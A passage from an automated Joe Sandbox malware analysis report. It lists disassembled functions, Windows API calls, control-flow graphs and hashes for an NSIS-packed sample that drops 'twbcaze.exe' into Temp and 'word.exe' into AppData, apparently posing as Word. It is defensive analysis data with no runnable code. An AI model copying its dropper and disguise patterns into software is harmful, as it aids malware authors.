                                          • Instruction ID: 62828f2e2b01cd2e9021f71d1007b468b6294b04ed91f3cf43b909f99e7c5814
                                          • Opcode Fuzzy Hash: d74ddf077dad9ccce0d63da47009af9ced08a9d3a58e0b3746407ee1fc4199ad
                                          • Instruction Fuzzy Hash: C151E371E00214ABDB209F64DE89B9E7BB4EF04355F20403BF904B62D1C7BC9E458A9D
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00402E8E Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 166fileCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 445 402e8e-402ea2 446 402ea4 445->446 447 402eab-402eb3 445->447 446->447 448 402eb5 447->448 449 402eba-402ebf 447->449 448->449 450 402ec1-402eca call 4030b3 449->450 451 402ecf-402edc call 403081 449->451 450->451 455 402ee2-402ee6 451->455 456 40302c 451->456 457 403015-403017 455->457 458 402eec-402f0c GetTickCount call 406005 455->458 459 40302e-40302f 456->459 460 403019-40301c 457->460 461 40306c-403070 457->461 469 403077 458->469 471 402f12-402f1a 458->471 463 40307a-40307e 459->463 466 403021-40302a call 403081 460->466 467 40301e 460->467 464 403031-403037 461->464 465 403072 461->465 472 403039 464->472 473 40303c-40304a call 403081 464->473 465->469 466->456 479 403074 466->479 467->466 469->463 476 402f1c 471->476 477 402f1f-402f2d call 403081 471->477 472->473 473->456 481 40304c-40305f WriteFile 473->481 476->477 477->456 483 402f33-402f3c 477->483 479->469 484 403011-403013 481->484 485 403061-403064 481->485 486 402f42-402f5f call 406025 483->486 484->459 485->484 487 403066-403069 485->487 490 402f65-402f7c GetTickCount 486->490 491 40300d-40300f 486->491 487->461 492 402fc1-402fc5 490->492 493 402f7e-402f86 490->493 491->459 496 403002-403005 492->496 497 402fc7-402fca 492->497 494 402f88-402f8c 493->494 495 402f8e-402fbe MulDiv wsprintfA call 404e84 493->495 494->492 494->495 495->492 496->471 498 40300b 496->498 500 402fea-402ff0 497->500 501 402fcc-402fde WriteFile 497->501 498->469 502 402ff6-402ffa 500->502 501->484 504 402fe0-402fe3 501->504 502->486 505 403000 502->505 504->484 506 402fe5-402fe8 504->506 505->469 506->502
                                          APIs
                                          • GetTickCount.KERNEL32(000000FF,00000004,00000000,00000000,00000000), ref: 00402EEC
                                          • GetTickCount.KERNEL32(0040B0E0,00004000), ref: 00402F6D
                                          • MulDiv.KERNEL32 ref: 00402F9A
                                          • wsprintfA.USER32 ref: 00402FAA
                                          • WriteFile.KERNELBASE(00000000,00000000,0040F0E0,00000000,00000000), ref: 00402FD6
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.356736397.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000005.00000002.356732850.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356741630.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356746108.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356746108.000000000040B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356746108.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356746108.000000000042A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356760134.000000000042D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356760134.0000000000433000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                          Similarity
                                          • API ID: CountTick$FileWritewsprintf
                                          • String ID: ... %d%%
                                          • API String ID: 4209647438-2449383134
                                          • Opcode ID: b944acebcfd11712949cb6564d56ed346294539165133d47b9c6a5aca850bb39
                                          • Instruction ID: 896dd5a5e80e39cb813739a9bcc38eeef40bacba50e05a76af68061f47ce39f0
                                          • Opcode Fuzzy Hash: b944acebcfd11712949cb6564d56ed346294539165133d47b9c6a5aca850bb39
                                          • Instruction Fuzzy Hash: 13518A3190120AABDF10DF65DA04AAF7BB8EB00395F14413BFD11B62C4D7789E41CBAA
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00401751 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 147stringtimeCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 507 401751-401774 call 402a29 call 4056f8 512 401776-40177c call 405b98 507->512 513 40177e-401790 call 405b98 call 40568b lstrcatA 507->513 518 401795-40179b call 405dfa 512->518 513->518 523 4017a0-4017a4 518->523 524 4017a6-4017b0 call 405e93 523->524 525 4017d7-4017da 523->525 533 4017c2-4017d4 524->533 534 4017b2-4017c0 CompareFileTime 524->534 526 4017e2-4017fe call 40586f 525->526 527 4017dc-4017dd call 405850 525->527 535 401800-401803 526->535 536 401876-40189f call 404e84 call 402e8e 526->536 527->526 533->525 534->533 537 401805-401847 call 405b98 * 2 call 405bba call 405b98 call 405459 535->537 538 401858-401862 call 404e84 535->538 550 4018a1-4018a5 536->550 551 4018a7-4018b3 SetFileTime 536->551 537->523 570 40184d-40184e 537->570 548 40186b-401871 538->548 553 4028c7 548->553 550->551 552 4018b9-4018c4 CloseHandle 550->552 551->552 555 4018ca-4018cd 552->555 556 4028be-4028c1 552->556 558 4028c9-4028cd 553->558 559 4018e2-4018e5 call 405bba 555->559 560 4018cf-4018e0 call 405bba lstrcatA 555->560 556->553 566 4018ea-402246 call 405459 559->566 560->566 566->556 566->558 570->548 572 401850-401851 570->572 572->538
                                          APIs
                                          • lstrcatA.KERNEL32(00000000,00000000,"C:\Users\user\AppData\Local\Temp\twbcaze.exe" ,C:\Users\user\AppData\Local\Temp,00000000,00000000,00000031), ref: 00401790
                                          • CompareFileTime.KERNEL32(-00000014,?,"C:\Users\user\AppData\Local\Temp\twbcaze.exe" ,"C:\Users\user\AppData\Local\Temp\twbcaze.exe" ,00000000,00000000,"C:\Users\user\AppData\Local\Temp\twbcaze.exe" ,C:\Users\user\AppData\Local\Temp,00000000,00000000,00000031), ref: 004017BA
                                            • Part of subcall function 00405B98: lstrcpynA.KERNEL32(?,?,00000400,004031A9,nrdosueajqjitn Setup,NSIS Error), ref: 00405BA5
                                            • Part of subcall function 00404E84: lstrlenA.KERNEL32(0041FD10,00000000,0040F0E0,00000000,?,?,?,?,?,?,?,?,?,00402FBE,00000000,?), ref: 00404EBD
                                            • Part of subcall function 00404E84: lstrlenA.KERNEL32(00402FBE,0041FD10,00000000,0040F0E0,00000000,?,?,?,?,?,?,?,?,?,00402FBE,00000000), ref: 00404ECD
                                            • Part of subcall function 00404E84: lstrcatA.KERNEL32(0041FD10,00402FBE,00402FBE,0041FD10,00000000,0040F0E0,00000000), ref: 00404EE0
                                            • Part of subcall function 00404E84: SetWindowTextA.USER32(0041FD10,0041FD10), ref: 00404EF2
                                            • Part of subcall function 00404E84: SendMessageA.USER32 ref: 00404F18
                                            • Part of subcall function 00404E84: SendMessageA.USER32 ref: 00404F32
                                            • Part of subcall function 00404E84: SendMessageA.USER32 ref: 00404F40
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.356736397.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000005.00000002.356732850.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356741630.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356746108.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356746108.000000000040B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356746108.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356746108.000000000042A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356760134.000000000042D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356760134.0000000000433000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                          Similarity
                                          • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                          • String ID: "C:\Users\user\AppData\Local\Temp\twbcaze.exe" $C:\Users\user\AppData\Local\Temp
                                          • API String ID: 1941528284-3433136141
                                          • Opcode ID: 1d83eeb157989370eef6aca95033163bd7760edd2b6c2f47f904ee0373184e1d
                                          • Instruction ID: ec6d4e4deed358595fa2340d5a7c786697911580d52a45c2a3a5a43c8a45cd53
                                          • Opcode Fuzzy Hash: 1d83eeb157989370eef6aca95033163bd7760edd2b6c2f47f904ee0373184e1d
                                          • Instruction Fuzzy Hash: 1C41E531900515BADF107FB5CC45EAF3679EF02329B60863BF425F10E2D67C9A418A6E
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00405346 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 39COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 574 405346-405391 CreateDirectoryA 575 405393-405395 574->575 576 405397-4053a4 GetLastError 574->576 578 4053be-4053c0 575->578 577 4053a6-4053ba SetFileSecurityA 576->577 576->578 577->575 579 4053bc GetLastError 577->579 579->578
                                          APIs
                                          • CreateDirectoryA.KERNELBASE(?,?,00000000), ref: 00405389
                                          • GetLastError.KERNEL32 ref: 0040539D
                                          • SetFileSecurityA.ADVAPI32(?,80000007,00000001), ref: 004053B2
                                          • GetLastError.KERNEL32 ref: 004053BC
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.356736397.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000005.00000002.356732850.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356741630.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356746108.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356746108.000000000040B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356746108.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356746108.000000000042A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356760134.000000000042D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356760134.0000000000433000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                          Similarity
                                          • API ID: ErrorLast$CreateDirectoryFileSecurity
                                          • String ID: C:\Users\user\AppData\Roaming$Ls@$\s@
                                          • API String ID: 3449924974-4232301360
                                          • Opcode ID: 6211b517ce48024f91031cad3a720f7e2baa8210faa46a43940225e11b136f78
                                          • Instruction ID: c25a7037d2469be4335b8e9940eeaad57ca25a66f44a15dc7ff8fd6819e2376f
                                          • Opcode Fuzzy Hash: 6211b517ce48024f91031cad3a720f7e2baa8210faa46a43940225e11b136f78
                                          • Instruction Fuzzy Hash: 030108B1D14219EAEF119FA4CC047EFBFB8EB14354F004176D904B6280D7B8A604DFAA
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00405EBA Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36libraryCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 580 405eba-405eda GetSystemDirectoryA 581 405edc 580->581 582 405ede-405ee0 580->582 581->582 583 405ef0-405ef2 582->583 584 405ee2-405eea 582->584 585 405ef3-405f25 wsprintfA LoadLibraryExA 583->585 584->583 586 405eec-405eee 584->586 586->585
                                          APIs
                                          • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00405ED1
                                          • wsprintfA.USER32 ref: 00405F0A
                                          • LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 00405F1E
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.356736397.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000005.00000002.356732850.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356741630.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356746108.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356746108.000000000040B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356746108.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356746108.000000000042A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356760134.000000000042D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356760134.0000000000433000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                          Similarity
                                          • API ID: DirectoryLibraryLoadSystemwsprintf
                                          • String ID: %s%s.dll$UXTHEME$\
                                          • API String ID: 2200240437-4240819195
                                          • Opcode ID: 95ac327f182d4f2ec24d2199b65981d3e05ead90002209c0018270c035d5f6e2
                                          • Instruction ID: e0394f74180a6a16eba84a37178681bb1de021cb3750537530e5e19d16d25b78
                                          • Opcode Fuzzy Hash: 95ac327f182d4f2ec24d2199b65981d3e05ead90002209c0018270c035d5f6e2
                                          • Instruction Fuzzy Hash: AFF09C3094050967DB159B68DD0DFFB365CF708305F1405B7B586E11C2DA74E9158FD9
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0040589E Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 32COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 587 40589e-4058a8 588 4058a9-4058d3 GetTickCount GetTempFileNameA 587->588 589 4058e2-4058e4 588->589 590 4058d5-4058d7 588->590 592 4058dc-4058df 589->592 590->588 591 4058d9 590->591 591->592
                                          APIs
                                          • GetTickCount.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Roaming\word.exe,004030F9,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,?,00403289), ref: 004058B1
                                          • GetTempFileNameA.KERNEL32(?,0061736E,00000000,?), ref: 004058CB
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.356736397.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000005.00000002.356732850.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356741630.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356746108.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356746108.000000000040B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356746108.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356746108.000000000042A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356760134.000000000042D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356760134.0000000000433000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                          Similarity
                                          • API ID: CountFileNameTempTick
                                          • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\word.exe$nsa
                                          • API String ID: 1716503409-3536471476
                                          • Opcode ID: 0450f55a1c395314d18141c5bfd7e62b2554956accf044952057d9506f78994b
                                          • Instruction ID: e60e9e2f6482c2c4b9a71223117799e22c549444224f45eff9547ee1bfe60b0e
                                          • Opcode Fuzzy Hash: 0450f55a1c395314d18141c5bfd7e62b2554956accf044952057d9506f78994b
                                          • Instruction Fuzzy Hash: 46F0A7373482447AE7105E55DC04B9B7F9DDFD1750F10C027FE049A280D6B49954C7A5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 004015B3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 676 4015b3-4015c6 call 402a29 call 40571f 681 4015c8-4015db call 4056b6 676->681 682 40161c-40161f 676->682 689 4015f3-4015f4 call 4053c3 681->689 690 4015dd-4015e0 681->690 684 401621-40163c call 401423 call 405b98 SetCurrentDirectoryA 682->684 685 40164a-40219c call 401423 682->685 697 4028be-4028cd 684->697 701 401642-401645 684->701 685->697 698 4015f9-4015fb 689->698 690->689 694 4015e2-4015e9 call 4053e0 690->694 694->689 706 4015eb-4015ec call 405346 694->706 702 401612-40161a 698->702 703 4015fd-401602 698->703 701->697 702->681 702->682 707 401604-40160d GetFileAttributesA 703->707 708 40160f 703->708 711 4015f1 706->711 707->702 707->708 708->702 711->698
                                          APIs
                                            • Part of subcall function 0040571F: CharNextA.USER32(004054D1), ref: 0040572D
                                            • Part of subcall function 0040571F: CharNextA.USER32(00000000), ref: 00405732
                                            • Part of subcall function 0040571F: CharNextA.USER32(00000000), ref: 00405741
                                          • GetFileAttributesA.KERNELBASE(00000000,00000000,00000000,0000005C,00000000,000000F0), ref: 00401605
                                            • Part of subcall function 00405346: CreateDirectoryA.KERNELBASE(?,?,00000000), ref: 00405389
                                          • SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\AppData\Local\Temp,00000000,00000000,000000F0), ref: 00401634
                                          Strings
                                          • C:\Users\user\AppData\Local\Temp, xrefs: 00401629
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.356736397.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000005.00000002.356732850.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356741630.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356746108.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356746108.000000000040B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356746108.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356746108.000000000042A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356760134.000000000042D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356760134.0000000000433000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                          Similarity
                                          • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                          • String ID: C:\Users\user\AppData\Local\Temp
                                          • API String ID: 1892508949-2935972921
                                          • Opcode ID: 2bf56f72201c9e699422734a4e548a5e4c3f3c6807ff828ac4a79b9dc522e826
                                          • Instruction ID: 7e794a0d764ef42534189bc4677109bd04a63590121f3ac1906b169044d7ab5d
                                          • Opcode Fuzzy Hash: 2bf56f72201c9e699422734a4e548a5e4c3f3c6807ff828ac4a79b9dc522e826
                                          • Instruction Fuzzy Hash: 67112B35504141ABEF317BA55D419BF26B0EE92314728063FF582722D2C63C0943A62F
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0040576C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46stringCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 712 40576c-405787 call 405b98 call 40571f 717 405789-40578b 712->717 718 40578d-40579a call 405dfa 712->718 719 4057df-4057e1 717->719 722 4057a6-4057a8 718->722 723 40579c-4057a0 718->723 725 4057be-4057c7 lstrlenA 722->725 723->717 724 4057a2-4057a4 723->724 724->717 724->722 726 4057c9-4057dd call 40568b GetFileAttributesA 725->726 727 4057aa-4057b1 call 405e93 725->727 726->719 732 4057b3-4057b6 727->732 733 4057b8-4057b9 call 4056d2 727->733 732->717 732->733 733->725
                                          APIs
                                            • Part of subcall function 00405B98: lstrcpynA.KERNEL32(?,?,00000400,004031A9,nrdosueajqjitn Setup,NSIS Error), ref: 00405BA5
                                            • Part of subcall function 0040571F: CharNextA.USER32(004054D1), ref: 0040572D
                                            • Part of subcall function 0040571F: CharNextA.USER32(00000000), ref: 00405732
                                            • Part of subcall function 0040571F: CharNextA.USER32(00000000), ref: 00405741
                                          • lstrlenA.KERNEL32(C:\,00000000,C:\,C:\,?,?,?,004054D1,?,C:\Users\user\AppData\Local\Temp\,?), ref: 004057BF
                                          • GetFileAttributesA.KERNELBASE(C:\,C:\,C:\,C:\,C:\,C:\,00000000,C:\,C:\,?,?,?,004054D1,?,C:\Users\user\AppData\Local\Temp\,?), ref: 004057CF
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.356736397.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000005.00000002.356732850.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356741630.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356746108.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356746108.000000000040B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356746108.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356746108.000000000042A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356760134.000000000042D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356760134.0000000000433000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                          Similarity
                                          • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                          • String ID: C:\
                                          • API String ID: 3248276644-3404278061
                                          • Opcode ID: 0c6b5d1daa3c2ede88059e0d3e78c561d31498b229fd294e54aeb43f41febe10
                                          • Instruction ID: 54d673280676c30d7487fb506765264cad7adccc2ba99e33922fd806b78c8ed4
                                          • Opcode Fuzzy Hash: 0c6b5d1daa3c2ede88059e0d3e78c561d31498b229fd294e54aeb43f41febe10
                                          • Instruction Fuzzy Hash: DAF0C829105D509AD222373A5C05ABF2655CE86364F19063BFC55B32D2DB3C8943FD7E
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 004053F8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 735 4053f8-405425 CreateProcessA 736 405433-405434 735->736 737 405427-405430 CloseHandle 735->737 737->736
                                          APIs
                                          • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00422540,Error launching installer), ref: 0040541D
                                          • CloseHandle.KERNEL32(?), ref: 0040542A
                                          Strings
                                          • Error launching installer, xrefs: 0040540B
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.356736397.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000005.00000002.356732850.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356741630.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356746108.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356746108.000000000040B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356746108.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356746108.000000000042A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356760134.000000000042D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356760134.0000000000433000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                          Similarity
                                          • API ID: CloseCreateHandleProcess
                                          • String ID: Error launching installer
                                          • API String ID: 3712363035-66219284
                                          • Opcode ID: d49f44695edecb7d462127f99e45c7a2ce7d09c155a88fefc4d0509107339d45
                                          • Instruction ID: 7090b7fc8b0b8bfe0e18f62cc41de09a41a9c6505e722368f6ae49628a4dc155
                                          • Opcode Fuzzy Hash: d49f44695edecb7d462127f99e45c7a2ce7d09c155a88fefc4d0509107339d45
                                          • Instruction Fuzzy Hash: F6E0ECB4A00219BBDB109F64ED09AABBBBCFB00304F50C521E910E2160E774E950CA69
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00406609 Relevance: 5.2, APIs: 4, Instructions: 236COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.356736397.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000005.00000002.356732850.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356741630.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356746108.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356746108.000000000040B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356746108.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356746108.000000000042A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356760134.000000000042D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356760134.0000000000433000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 00f2de6477f22270801ef5006171c2706c5d9d3ffcda3e5f9c9b7caabde0979f
                                          • Instruction ID: 2446724231f05ea51107c8768389afa7e2a62b3a86e3c0cdb9b17195a5c17046
                                          • Opcode Fuzzy Hash: 00f2de6477f22270801ef5006171c2706c5d9d3ffcda3e5f9c9b7caabde0979f
                                          • Instruction Fuzzy Hash: E9A14F71E00228CFDB28CFA8C8547ADBBB1FB45305F21816AD956BB281D7785A96CF44
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0040680A Relevance: 5.2, APIs: 4, Instructions: 208COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.356736397.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000005.00000002.356732850.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356741630.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356746108.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356746108.000000000040B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356746108.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356746108.000000000042A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356760134.000000000042D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356760134.0000000000433000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: b90b51789b68cdbba6ca9369e5ad938c532d61a1d7775d6d72ffdff9632d9f26
                                          • Instruction ID: c9a91825e94b1235ed1e5db661991067e3a312009d26920905f6c04b87fbb156
                                          • Opcode Fuzzy Hash: b90b51789b68cdbba6ca9369e5ad938c532d61a1d7775d6d72ffdff9632d9f26
                                          • Instruction Fuzzy Hash: 25913F71E00228CFDF28DFA8C8547ADBBB1FB44305F15816AD916BB291C3789A96DF44
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00406520 Relevance: 5.2, APIs: 4, Instructions: 205COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.356736397.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000005.00000002.356732850.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
